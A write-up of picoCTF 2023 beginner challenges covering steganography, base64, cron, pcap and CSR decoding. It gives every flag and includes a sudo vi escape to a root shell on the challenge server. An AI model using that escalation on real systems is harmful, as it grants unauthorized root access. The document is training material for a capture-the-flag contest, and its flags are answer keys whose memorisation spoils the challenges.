picoCTF2023

chrono 

 |  | 100 points 

Tags: General Skillslinux 

AUTHOR: MUBARAK MIKAIL 

Description 

How to automate tasks to run at intervals on linux servers? 

Additional details will be available after launching your challenge instance. 

picoCTF{Sch3DUL7NG_T45K3_L1NUX_abe2c490} 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ ssh picoplayer@saturn.picoctf.net -p 64468 

picoplayer@challenge:~$ crontab -e 

no crontab for picoplayer - using an empty one 

update-alternatives: error: no alternatives for editor 

/usr/bin/sensible-editor: 25: editor: not found 

/usr/bin/sensible-editor: 28: nano: not found 

/usr/bin/sensible-editor: 31: nano-tiny: not found 

/usr/bin/sensible-editor: 34: vi: not found 

Couldn't find an editor! 

Set the $EDITOR environment variable to your desired editor. 

crontab: "/usr/bin/sensible-editor" exited with status 1 

picoplayer@challenge:~$ sudo crontab -e 

[sudo] password for picoplayer:  

picoplayer is not in the sudoers file.  This incident will be reported. 

picoplayer@challenge:~$ cd /etc 

picoplayer@challenge:/etc$ cat crontab 

# picoCTF{Sch3DUL7NG_T45K3_L1NUX_abe2c490} 

findme 

 |  | 100 points 

Tags: Web Exploitation 

AUTHOR: GEOFFREY NJOGU 

Description 

Help us test the form by submiting the username as test and password as test! 

Additional details will be available after launching your challenge instance. 

picoCTF{proxies_all_the_way_599a80c2} 

Go to the site, follow the instructions.  

Poked around the site, but could not find anything. 

Use Developer Tool, capture traffic from the first page to login success, you see there are two entried with no response: 

http://saturn.picoctf.net:56021/next-page/id=cGljb0NURntwcm94aWVzX2Fs 

http://saturn.picoctf.net:56021/next-page/id=bF90aGVfd2F5XzU5OWE4MGMyfQ==  

The values of id look like base64 encoded. Decode these two id values and you get the flag. 

hideme 

 |  | 100 points 

Tags: Forensicssteganography 

AUTHOR: GEOFFREY NJOGU 

Description 

Every file gets a flag.The SOC analyst saw one image been sent back and forth between two people. They decided to investigate and found out that there was more than what meets the eye here. 

picoCTF{Hidding_An_imag3_within_@n_ima9e_c31884c7} 

Try online tool first. 

https://aperisolve.fr/  

Looks binwalk found some hidden file. 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ binwalk flag.png   

DECIMAL   HEXADECIMAL DESCRIPTION 

-------------------------------------------------------------------------------- 

0         0x0         PNG image, 512 x 504, 8-bit/color RGBA, non-interlaced 

41        0x29            Zlib compressed data, compressed 

39739     0x9B3B      Zip archive data, at least v1.0 to extract, name: secret/ 

39804     0x9B7C      Zip archive data, at least v2.0 to extract, compressed size: 2832, uncompressed size: 2984, name: secret/flag.png 

42871     0xA777      End of Zip archive, footer length: 22 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ binwalk -e flag.png 

DECIMAL   HEXADECIMAL DESCRIPTION 

-------------------------------------------------------------------------------- 

0         0x0         PNG image, 512 x 504, 8-bit/color RGBA, non-interlaced 

41        0x29            Zlib compressed data, compressed 

39739     0x9B3B      Zip archive data, at least v1.0 to extract, name: secret/ 

39804     0x9B7C      Zip archive data, at least v2.0 to extract, compressed size: 2832, uncompressed size: 2984, name: secret/flag.png 

42871     0xA777      End of Zip archive, footer length: 22 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ ls 

aaa.txt  atbash.jpg  encrypted.txt  flag.png  _flag.png.extracted 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ cd _flag.png.extracted  

┌──(kali㉿kali)-[~/Desktop/picoCTF/_flag.png.extracted] 

└─$ ls 

29  29.zlib  9B3B.zip  secret 

┌──(kali㉿kali)-[~/Desktop/picoCTF/_flag.png.extracted] 

└─$ cd secret              

┌──(kali㉿kali)-[~/Desktop/picoCTF/_flag.png.extracted/secret] 

└─$ ls 

flag.png 

HideToSee 

 |  | 100 points 

Tags: Cryptography 

AUTHOR: SUNDAY JACOB NWANYIM 

Description 

How about some hide and seek heh?Look at this image here. 

picoCTF{atbash_crack_6c4bcb08} 

Tried online tool: 

https://aperisolve.fr/  

Online steg site with all the tools together 

It has strings, exiftool and some others. The simple ones didn't work. 

Try steghide. 

Try password atbash with steghide and it does not work. 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ steghide info atbash.jpg       

"atbash.jpg": 

  format: jpeg 

  capacity: 2.4 KB 

Try to get information about embedded data ? (y/n) y 

Enter passphrase:  

steghide: could not extract any data with that passphrase! 

Try without password and it worked.                 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ steghide info atbash.jpg 

"atbash.jpg": 

  format: jpeg 

  capacity: 2.4 KB 

Try to get information about embedded data ? (y/n) y 

Enter passphrase:  

  embedded file "encrypted.txt": 

size: 31.0 Byte 

encrypted: rijndael-128, cbc 

compressed: yes 

Extract file without password.                                                   

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ steghide extract -sf  atbash.jpg 

Enter passphrase:  

wrote extracted data to "encrypted.txt". 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ cat encrypted.txt                           

krxlXGU{zgyzhs_xizxp_6x4yxy08} 

Notice the image says atbash. So decode this string with atbash decoder: 

picoCTF{atbash_crack_6c4bcb08} 

MatchTheRegex 

 |  | 100 points 

Tags: Web Exploitation 

AUTHOR: SUNDAY JACOB NWANYIM 

Description 

How about trying to match a regular expressionThe website is running here. 

picoCTF{succ3ssfully_matchtheregex_18b306a0} 

First try search with ***, get an error. 

Then try search with picoCTF*** and it worked

money-ware 

|  

| 100 points 

Tags:  

Author: Juni19 

Description 

Flag format: picoCTF{Malwarename} The first letter of the malware name should be capitalized and the rest lowercase. Your friend just got hacked and has been asked to pay some bitcoins to 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. He doesn’t seem to understand what is going on and asks you for advice. Can you identify what malware he’s being a victim of? 

Just google 

"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX malware" 

You will find news that points to a malware named Petya. 

picoCTF{Petya} 

PcapPoisoning 

 |  | 100 points 

Tags: Forensicspcap 

AUTHOR: MUBARAK MIKAIL 

Description 

How about some hide and seek heh?Download this file and find the flag. 

Open the file in wireshark. 

Search key word pico. And you will find it. 

picoCTF{P64P_4N4L7S1S_SU55355FUL_ba1a6097} 

Permissions 

 |  | 100 points 

Tags: General Skillsvim 

AUTHOR: GEOFFREY NJOGU 

Description 

Can you read files in the root file?The system admin has provisioned an account for you on the main server:ssh -p 58850 picoplayer@saturn.picoctf.netPassword: cbjrrAIyO4Can you login and read the root file? 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ ssh -p 58850 picoplayer@saturn.picoctf.net 

The authenticity of host '[saturn.picoctf.net]:58850 ([3.12.65.157]:58850)' can't be established. 

ED25519 key fingerprint is SHA256:oCgGxVpfRH0kgCbgMYs6D+4eE2zVsDCCjmEzmEiK2iQ. 

This key is not known by any other names 

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 

Warning: Permanently added '[saturn.picoctf.net]:58850' (ED25519) to the list of known hosts. 

picoplayer@saturn.picoctf.net's password:  

picoplayer@challenge:~$ cd /root 

-bash: cd: /root: Permission denied 

picoplayer@challenge:~$ whoami 

picoplayer 

picoplayer@challenge:~$ sudo -i 

[sudo] password for picoplayer:  

Sorry, user picoplayer is not allowed to execute '/bin/bash' as root on challenge. 

picoplayer@challenge:~$ sudo -l 

[sudo] password for picoplayer:  

Matching Defaults entries for picoplayer on challenge: 

    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 

User picoplayer may run the following commands on challenge: 

(ALL) /usr/bin/vi 

First see if you can use vi to open the flag.txt file under /root. 

picoplayer@challenge:~$ vi /root/flag.txt 

picoplayer@challenge:~$ sudo vi /root/flag.txt 

Nothing showed up. 

So you can run vi with sudo permission, check what command can be used to get a root shell from vi: 

https://gtfobins.github.io/gtfobins/vi/#sudo  

picoplayer@challenge:~$ sudo vi -c ':!/bin/sh' /dev/null 

# cd /root 

# ls 

flag.txt 

# cat flag.txt 

# ls -al 

total 16 

drwx------ 1 root root   38 Mar 15 08:17 . 

drwxr-xr-x 1 root root   63 Mar 15 08:14 .. 

-rw-r--r-- 1 root root 3106 Dec  5  2019 .bashrc 

-rw-r--r-- 1 root root   35 Mar 15 02:46 .flag.txt 

-rw-r--r-- 1 root root  161 Dec  5  2019 .profile 

-rw------- 1 root root  707 Mar 15 08:17 .viminfo 

-rw-r--r-- 1 root root 0 Mar 15 08:17 flag.txt 

# cat .flag.txt 

picoCTF{uS1ng_v1m_3dit0r_27f6a05a} 

#  

ReadMyCert 

 |  | 100 points 

Tags: Cryptography 

AUTHOR: SUNDAY JACOB NWANYIM 

Description 

How about we take you on an adventure on exploring certificate signing requestsTake a look at this CSR file here. 

Download the CSR file, try base64 decoder. So just decode the file and you will get the flag. If you want to read all the contents, try a CSR decoder https://www.sslshopper.com/csr-decoder.html . The flag is the common name of the cert. 

picoCTF{read_mycert_12eba7f1}